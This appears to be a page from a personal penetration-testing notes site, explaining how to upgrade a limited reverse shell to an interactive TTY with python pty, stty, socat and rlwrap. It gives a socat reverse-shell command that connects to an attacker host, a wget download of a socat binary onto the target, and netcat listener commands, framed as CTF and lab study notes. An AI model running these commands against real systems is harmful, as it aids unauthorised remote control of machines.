# Disboard #
  • Reconnaissance
    • Quick Guide
    • Ports and Protocols
    • Passive Reconnaissance
    • Active Reconnaissance
  • Enumeration
    • Password Cracking
    • Hydra
    • Wireshark
    • Snort
    • Steganography
  • Web
    • OWASP Top 10
    • OWASP API
    • SQL Injection
      • Microsoft SQL Injection
    • Cross Site Scripting
    • Browser Vulnerabilities
    • Fuzzing
  • Linux
    • Privilege Escalation
    • Docker
    • Program Life Cycle
  • Windows
    • Privilege Escalation
    • Active Directory
    • Powershell
  • Event Logs
    • Sysmon
  • Exploitation
    • Shells
      • Upgrading Shells
    • Metasploit
      • Meterpreter
    • KOTH
    • Source Code Review
  • Hack the Box
    • ARCHETYPE
    • BASE
    • BASHED
    • EXPLORE
    • NIBBLES
  • Try Hack Me
    • ADVENTURE TIME
    • HACKFINITY
    • MOTHER'S SECRET
    • OFFSEC
    • POSTEXPLOIT
    • ROASTED
    • TEMPEST
    • TRAVERSE
  • CompTIA
    • Network
      • 1.0 Networking Fundamentals
      • 2.0 Network Implementations
      • 3.0 Network Operations
      • 4.0 Network Security
      • 5.0 Network Troubleshooting
    • PenTest
  • SIEM
    • Splunk
    • Elastic
  • Wireless
    • Wi-Fi Hacking
  • Other
    • PicoCTF
    • SSH Tunneling
    • Life Hacks
    • My Pokémon API
    • Github
Powered by GitBook
On this page
  • Python PTY Upgrade
  • Socat Upgrade
  • RLWrap Upgrade
  1. Exploitation
  2. Shells

Upgrading Shells

A list of methods to upgrade shells to fully interactive TTYs!

Python PTY Upgrade

Run the following command in the limited shell:

python -c 'import pty; pty.spawn("/bin/bash")'

The shell will now look prettier and have some TTY capabailities. To make it have full interactivty, use the following command to give access to term commands such as clear:

export TERM=xterm

Finally, background the shell with [Ctrl-Z] option, then from the attack box, use the following command. This will turn off the attack box's terminal echo which gives autocompletes and arrow keys. Then it will foreground the shell again.

stty raw -echo
fg

If this works, it will end as a fully interactive TTY shell. Sometimes, it might also be useful to modify the terminal tty size. This can be done by checking your attack box's values and then copying them over with the following:

# Attack box - gives row and column length
stty -a
# Shell
stty rows $ROW_LENGTH
stty cols $COL_LENGTH

Socat Upgrade

The following method uses socat to create a second reverse shell for a fully interactive shell through the following methodology.

On the attack box, create a listener:

socat file:`tty`,raw,echo=0 tcp-listen:4444

On the target, launch a reverse shell:

socat exec:'bash-li',pty,stderr,setsid,sigint,sane tcp:$IP:4444

If socat is missing, it can be installed using a static generated version with the following command:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
chmod +x /tmp/socat

RLWrap Upgrade

The program rlwrap gives access to history, tab autocompletion, and the arrow keys immediately upon receiving a shell. Sometimes, manual stabilization must still be utilized for interrupts like [Ctrl-C] to be used.

rlwrap nc -nvlp $PORT

Often times, this can be an alias as well to overwrite a listener.

alias listener='sudo rlwrap nc -nvlp'
PreviousShellsNextMetasploit

Last updated 1 year ago